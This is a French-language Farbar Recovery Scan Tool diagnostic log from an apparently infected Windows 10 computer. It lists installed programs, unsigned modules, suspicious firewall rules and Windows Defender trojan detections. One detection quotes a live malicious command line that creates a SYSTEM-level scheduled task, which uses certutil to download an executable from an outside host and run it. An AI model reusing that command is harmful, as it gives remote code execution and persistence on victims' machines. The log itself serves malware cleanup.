Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 22-12-2019 Exécuté par Maël (22-12-2019 18:31:46) Exécuté depuis C:\Users\Maël\Desktop Windows 10 Enterprise Version 1803 17134.1184 (X64) (2019-11-16 17:57:28) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-3517242231-1405562412-4047506948-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-3517242231-1405562412-4047506948-503 - Limited - Disabled) Invité (S-1-5-21-3517242231-1405562412-4047506948-501 - Limited - Disabled) Maël (S-1-5-21-3517242231-1405562412-4047506948-1001 - Administrator - Enabled) => C:\Users\Maël WDAGUtilityAccount (S-1-5-21-3517242231-1405562412-4047506948-504 - Limited - Disabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) µTorrent (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\uTorrent) (Version: 3.5.5.45395 - BitTorrent Inc.) CloudNet (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION Discord (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\Discord) (Version: 0.0.305 - Discord Inc.) Epic Games Launcher (HKLM-x32\...\{6653362F-9365-4A3C-9BF8-71494529DE06}) (Version: 1.1.236.0 - Epic Games, Inc.) Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden FiveM (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\CitizenFX_FiveM) (Version: - The CitizenFX Collective) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.88 - Google LLC) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.421 - Google LLC) Hidden Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc) Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\OneDriveSetup.exe) (Version: 19.192.0926.0012 - Microsoft Corporation) NordVPN (HKLM-x32\...\{1F65DF2C-97B0-402F-A484-FDEC48DB63A1}) (Version: 6.26.7 - NordVPN) Hidden NordVPN (HKLM-x32\...\NordVPN 6.26.7) (Version: 6.26.7 - NordVPN) NordVPN network TAP (HKLM-x32\...\{97DEC5D6-2BE9-45BB-BFC5-274B851B486B}) (Version: 1.0.1 - NordVPN) Panneau de configuration NVIDIA 441.12 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 441.12 - NVIDIA Corporation) Hidden pdfreader2019 version 20.01 (HKLM-x32\...\{992AED7A-14D8-43BC-A658-83D250F99526}_is1) (Version: 20.01 - ) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) WinRAR 5.71 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH) Packages: ========= Bureau à distance Microsoft -> C:\Program Files\WindowsApps\Microsoft.RemoteDesktop_10.1.1107.0_x86__8wekyb3d8bbwe [2019-11-16] (Microsoft Corporation) iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa [2019-12-12] (Apple Inc.) [Startup Task] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-11-16] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-11-16] (Microsoft Corporation) [MS Ad] Microsoft News: les actualités à ne pas manquer -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.34.13393.0_x64__8wekyb3d8bbwe [2019-12-18] (Microsoft Corporation) [MS Ad] Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.5.12061.0_x64__8wekyb3d8bbwe [2019-12-11] (Microsoft Studios) [MS Ad] Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.6.23362.0_x64__8wekyb3d8bbwe [2019-12-05] (Microsoft Corporation) Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_19.11125.4599.0_x64__8wekyb3d8bbwe [2019-12-15] (Microsoft Corporation) MSN Météo -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.34.13393.0_x64__8wekyb3d8bbwe [2019-12-18] (Microsoft Corporation) [MS Ad] Network Speed Test -> C:\Program Files\WindowsApps\Microsoft.NetworkSpeedTest_1.0.0.23_x64__8wekyb3d8bbwe [2019-11-16] (Microsoft Research) ==================== Personnalisé CLSID (Avec liste blanche): ============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal) ==================== Codecs (Avec liste blanche) ==================== ==================== Raccourcis & WMI ======================== ==================== Modules chargés (Avec liste blanche) ============= 2019-10-16 05:32 - 2019-10-16 05:32 - 000262656 _____ () [Fichier non signé] C:\Program Files (x86)\NordVPN\x86\Liberation.Native.Firewall.dll 2019-12-22 16:16 - 2019-12-22 16:16 - 000014848 _____ () [Fichier non signé] C:\Users\Maël\AppData\Local\vinkoo.dll 2019-11-16 19:13 - 2019-11-16 19:14 - 098275328 _____ () [Fichier non signé] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll 2019-11-16 19:14 - 2019-11-16 19:14 - 000092672 _____ () [Fichier non signé] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll 2019-11-16 19:14 - 2019-11-16 19:14 - 003922432 _____ () [Fichier non signé] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll 2019-11-16 19:12 - 2019-11-16 19:13 - 000547840 _____ (The Chromium Authors) [Fichier non signé] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll ==================== Alternate Data Streams (Avec liste blanche) ======== (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) AlternateDataStreams: C:\Users\Maël\ntuser.ini:NTV [12390] AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [474] ==================== Mode sans échec (Avec liste blanche) ================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Avec liste blanche) ================= ==================== Internet Explorer sites de confiance/sensibles ========== ==================== Hosts contenu: ========================= (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2019-11-16 16:32 - 2019-11-16 16:30 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts ==================== Autres zones =========================== (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg DNS Servers: 192.168.1.254 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == ==================== RèglesPare-feu (Avec liste blanche) ================ (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [{F02CF6B4-81F4-4561-BA79-001561ADFC0E}] => (Allow) C:\Riot Games\League of Legends\LeagueClient.exe (Riot Games, Inc. -> ) FirewallRules: [{20CB2C3A-D73A-4542-A86E-4D24C6E05FFF}] => (Allow) C:\Riot Games\League of Legends\LeagueClient.exe (Riot Games, Inc. -> ) FirewallRules: [{7050A7F1-9FD4-4AE5-A796-95599E58E1F6}] => (Allow) C:\Users\Maël\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{C456B090-AEA5-4F88-9ED6-6E58C856CBE4}] => (Allow) C:\Users\Maël\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{DE0ECC09-0655-4555-A36F-46D6E3047F60}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe Pas de fichier FirewallRules: [{ABD60CB5-C5BF-4BA8-BBAF-DF1B8037114A}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Pas de fichier FirewallRules: [{B3DC314F-9F54-4BC8-AE17-FD1E340259C5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation) FirewallRules: [{4CE39A55-7C7D-4A1F-919C-D9149DEA7C3C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation) FirewallRules: [{89CE58CB-F5C6-416C-9DCF-1D6629EC9B3E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier FirewallRules: [{42047E1F-8276-428C-9D28-0F9676DAE4A4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier FirewallRules: [TCP Query User{5F4B5C77-7C4F-41F0-8454-3929640A4A65}D:\runtime\jre-x64\bin\javaw.exe] => (Allow) D:\runtime\jre-x64\bin\javaw.exe Pas de fichier FirewallRules: [UDP Query User{BE1B1804-E5DE-4F2A-901E-DB38082640D8}D:\runtime\jre-x64\bin\javaw.exe] => (Allow) D:\runtime\jre-x64\bin\javaw.exe Pas de fichier FirewallRules: [TCP Query User{2ECF84F0-1B49-4471-A73B-BA237EB5C5E5}C:\riot games\league of legends\game\league of legends.exe] => (Allow) C:\riot games\league of legends\game\league of legends.exe (Riot Games, Inc. -> ) FirewallRules: [UDP Query User{E6716072-585A-4874-994A-4EC1680BCBCC}C:\riot games\league of legends\game\league of legends.exe] => (Allow) C:\riot games\league of legends\game\league of legends.exe (Riot Games, Inc. -> ) FirewallRules: [{BAE31A0B-CBE5-4C19-9B06-1132F72809F5}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation) FirewallRules: [{B706C61F-6122-4175-ACC4-4730B8CB6B0F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation) FirewallRules: [{F0836357-43EB-425F-82D6-D815A7997AEA}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{238B530D-13E8-40F1-9D39-6CF0607EB7CB}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{AECDB459-13C0-46DD-B874-8A65FD893133}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{CD1522BF-0BC3-4E81-A914-C10B7CFFC8A3}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{D8784393-0CD8-4286-9D49-4782B9B07EF5}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{DDD59B34-585C-4881-B720-2176814B7945}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{0884C9C4-0C97-4153-BBBE-B358CF8F5764}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{D077D336-29D8-4BE0-B4B2-DC93881400D2}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{6081CB5F-B9E1-4F72-BB61-2C7017A42794}] => (Allow) D:\SteamLibrary\steamapps\common\Grand Theft Auto V\PlayGTAV.exe (Rockstar Games, Inc. -> Rockstar Games) FirewallRules: [{BCFD6EC1-D0C7-4126-9927-DDF6C6DFE040}] => (Allow) D:\SteamLibrary\steamapps\common\Grand Theft Auto V\PlayGTAV.exe (Rockstar Games, Inc. -> Rockstar Games) FirewallRules: [TCP Query User{49BEF592-1577-4CEB-813B-0849B3635D1A}C:\users\maël\appdata\local\fivem\fivem.exe] => (Allow) C:\users\maël\appdata\local\fivem\fivem.exe (cfx-collective) [Fichier non signé] FirewallRules: [UDP Query User{23981262-41A9-47CB-B119-386968A2D135}C:\users\maël\appdata\local\fivem\fivem.exe] => (Allow) C:\users\maël\appdata\local\fivem\fivem.exe (cfx-collective) [Fichier non signé] FirewallRules: [TCP Query User{BC7BE127-F558-4324-8FC5-80273C28A17B}C:\users\maël\appdata\local\fivem\fivem.app\cache\subprocess\fivem_gtaprocess.exe] => (Allow) C:\users\maël\appdata\local\fivem\fivem.app\cache\subprocess\fivem_gtaprocess.exe (cfx-collective) [Fichier non signé] FirewallRules: [UDP Query User{A1A159A6-18B1-4B42-8C8D-2EE16EDC1C27}C:\users\maël\appdata\local\fivem\fivem.app\cache\subprocess\fivem_gtaprocess.exe] => (Allow) C:\users\maël\appdata\local\fivem\fivem.app\cache\subprocess\fivem_gtaprocess.exe (cfx-collective) [Fichier non signé] FirewallRules: [{651AF9EB-BF41-4474-BCEF-8C4C38FD7F00}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{D7699BD7-1E5E-40B0-8317-8D4C829DB1FC}] => (Allow) C:\Windows\rss\csrss.exe () [Fichier non signé] FirewallRules: [{7EEBF6B3-92D3-433F-B43F-AB836CFCFB8F}] => (Allow) C:\Users\Maël\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [Fichier non signé] FirewallRules: [{DECE9CE9-9BDF-402B-ACBD-A29352E9BABE}] => (Allow) C:\ProgramData\winnmgr\svcnetwk.exe Pas de fichier FirewallRules: [{EF1FC622-B1B0-412F-AC64-04583367AF54}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) ==================== Points de restauration ========================= ATTENTION: La Restauration système est désactivée (Total:58.67 GB) (Free:13.32 GB) (23%) ==================== Éléments en erreur du Gestionnaire de périphériques ============ ==================== Erreurs du Journal des événements: ======================== Erreurs Application: ================== Error: (12/22/2019 05:44:48 PM) (Source: SideBySide) (EventID: 59) (User: ) Description: La création du contexte d’activation a échoué pour « C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe » à la ligne 0. Syntaxe XML non valide. Error: (12/22/2019 04:48:34 PM) (Source: EventSvc) (EventID: 0) (User: ) Description: Event-ID 0 Error: (12/22/2019 04:38:04 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-QIKLCL4) Description: httphttp-2147467263 Error: (12/22/2019 04:37:55 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-QIKLCL4) Description: httphttp-2147467263 Error: (12/22/2019 04:29:18 PM) (Source: EventSvc) (EventID: 0) (User: ) Description: Event-ID 0 Error: (12/22/2019 04:17:48 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante wyfdggm.exe, version : 0.0.0.0, horodatage : 0x5dfd76b3 Nom du module défaillant : ntdll.dll, version : 10.0.17134.799, horodatage : 0x636bcb43 Code d’exception : 0xc0000374 Décalage d’erreur : 0x000d8519 ID du processus défaillant : 0x1630 Heure de début de l’application défaillante : 0x01d5b8daf48480ef Chemin d’accès de l’application défaillante : C:\Users\Maël\AppData\Local\Temp\qdd4qw4ndre\wyfdggm.exe Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll ID de rapport : bcf13d1f-cfe9-4fe8-9456-a22b2df646ed Nom complet du package défaillant : ID de l’application relative au package défaillant : Error: (12/22/2019 04:17:45 PM) (Source: ESENT) (EventID: 333) (User: ) Description: wyfdggm (5680,D,100) d: The database [C:\Program Files (x86)\Forja\d] version 1568.60.140 is higher than the maximum version configured by the application 1568.20.0. Current engine format version parameter setting: 0x40000001 (JET_efvUseEngineDefault) Error: (12/22/2019 04:17:45 PM) (Source: ESENT) (EventID: 333) (User: ) Description: wyfdggm (5680,D,100) d: The database [C:\Program Files (x86)\Forja\d] version 1568.60.140 is higher than the maximum version configured by the application 1568.20.0. Current engine format version parameter setting: 0x40000001 (JET_efvUseEngineDefault) Erreurs système: ============= Error: (12/22/2019 06:18:12 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Exécution pour l’application serveur COM avec le CLSID Windows.SecurityCenter.WscDataProtection et l’APPID Non disponible au SID AUTORITE NT\Système de l’utilisateur (S-1-5-18) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (12/22/2019 06:18:12 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Exécution pour l’application serveur COM avec le CLSID Windows.SecurityCenter.WscBrokerManager et l’APPID Non disponible au SID AUTORITE NT\Système de l’utilisateur (S-1-5-18) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (12/22/2019 06:18:12 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-QIKLCL4) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID DESKTOP-QIKLCL4\Maël de l’utilisateur (S-1-5-21-3517242231-1405562412-4047506948-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (12/22/2019 06:16:43 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-QIKLCL4) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID DESKTOP-QIKLCL4\Maël de l’utilisateur (S-1-5-21-3517242231-1405562412-4047506948-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (12/22/2019 06:15:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Le service nordvpn-service s’est terminé de manière inattendue. Ceci s’est produit 2 fois. L’action corrective suivante va être effectuée dans 60000 millisecondes : Redémarrer le service. Error: (12/22/2019 06:15:20 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service VIA Karaoke digital mixer Service s’est terminé de façon inattendue pour la 1ème fois. Error: (12/22/2019 06:15:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Le service NVIDIA Display Container LS s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 6000 millisecondes : Redémarrer le service. Error: (12/22/2019 06:10:40 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-QIKLCL4) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID DESKTOP-QIKLCL4\Maël de l’utilisateur (S-1-5-21-3517242231-1405562412-4047506948-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Windows Defender: =================================== Date: 2019-12-22 18:28:15.722 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Conteban.B!ml&threatid=2147735507&enterprise=0 Nom : Trojan:Win32/Conteban.B!ml ID : 2147735507 Gravité : Grave Catégorie : Cheval de Troie Chemin : file:_C:\Users\Maël\AppData\Local\K--Lam.bin Origine de la détection : Ordinateur local Type de détection : Chemin rapide Source de détection : Système Utilisateur : AUTORITE NT\Système Nom du processus : Unknown Version de la signature : AV: 1.307.955.0, AS: 1.307.955.0, NIS: 1.307.955.0 Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7 Date: 2019-12-22 18:16:26.877 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nom : Trojan:Win32/Ceprolad.A ID : 2147726914 Gravité : Grave Catégorie : Cheval de Troie Chemin : CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://imaginemix.ru/app/app.exe C:\Users\Maël\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Maël\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F Origine de la détection : Inconnu Type de détection : Concret Source de détection : Système Utilisateur : AUTORITE NT\Système Nom du processus : Unknown Version de la signature : AV: 1.307.944.0, AS: 1.307.944.0, NIS: 1.307.944.0 Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7 Date: 2019-12-22 18:16:25.384 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Contebrew.A!ml&threatid=251873&enterprise=0 Nom : Program:Win32/Contebrew.A!ml ID : 251873 Gravité : Moyenne Catégorie : Logiciel potentiellement non désiré Chemin : file:_C:\Users\Maël\AppData\Local\K--Lam.bin Origine de la détection : Ordinateur local Type de détection : Chemin rapide Source de détection : Système Utilisateur : AUTORITE NT\Système Nom du processus : Unknown Version de la signature : AV: 1.307.944.0, AS: 1.307.944.0, NIS: 1.307.944.0 Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7 Date: 2019-12-22 18:02:03.393 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Contebrew.A!ml&threatid=251873&enterprise=0 Nom : Program:Win32/Contebrew.A!ml ID : 251873 Gravité : Moyenne Catégorie : Logiciel potentiellement non désiré Chemin : file:_C:\Users\Maël\AppData\Local\K--Lam.bin Origine de la détection : Ordinateur local Type de détection : Chemin rapide Source de détection : Système Utilisateur : AUTORITE NT\Système Nom du processus : C:\Users\Maël\Desktop\FRST64.exe Version de la signature : AV: 1.307.944.0, AS: 1.307.944.0, NIS: 1.307.944.0 Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7 Date: 2019-12-22 17:58:54.448 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Contebrew.A!ml&threatid=251873&enterprise=0 Nom : Program:Win32/Contebrew.A!ml ID : 251873 Gravité : Moyenne Catégorie : Logiciel potentiellement non désiré Chemin : file:_C:\Users\Maël\AppData\Local\K--Lam.bin Origine de la détection : Ordinateur local Type de détection : Chemin rapide Source de détection : Système Utilisateur : AUTORITE NT\Système Nom du processus : C:\Users\Maël\Desktop\FRST64.exe Version de la signature : AV: 1.307.944.0, AS: 1.307.944.0, NIS: 1.307.944.0 Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7 CodeIntegrity: =================================== Date: 2019-11-16 18:56:20.667 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe because the set of per-page image hashes could not be found on the system. Date: 2019-11-16 18:56:20.663 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe because the set of per-page image hashes could not be found on the system. ==================== Infos Mémoire =========================== BIOS: American Megatrends Inc. 0602 11/13/2009 Carte mère: ASUSTeK Computer INC. P7P55 LX Processeur: Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz Pourcentage de mémoire utilisée: 38% Mémoire physique - RAM - totale: 8183.05 MB Mémoire physique - RAM - disponible: 5032.32 MB Mémoire virtuelle totale: 9783.05 MB Mémoire virtuelle disponible: 5193.12 MB ==================== Lecteurs ================================ Drive c: () (Fixed) (Total:58.67 GB) (Free:13.32 GB) NTFS Drive d: () (Fixed) (Total:298.09 GB) (Free:136.93 GB) NTFS \\?\Volume{103339d0-0000-0000-0000-100000000000}\ (Réservé au système) (Fixed) (Total:0.49 GB) (Free:0.46 GB) NTFS \\?\Volume{103339d0-0000-0000-0000-00ca0e000000}\ () (Fixed) (Total:0.47 GB) (Free:0.08 GB) NTFS ==================== MBR & Table des partitions ==================== ========================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 59.6 GB) (Disk ID: 103339D0) Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=58.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=479 MB) - (Type=27) ========================================================== Disk: 1 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 7C51E846) Partition 1: (Not Active) - (Size=298.1 GB) - (Type=07 NTFS) ==================== Fin de Addition.txt =======================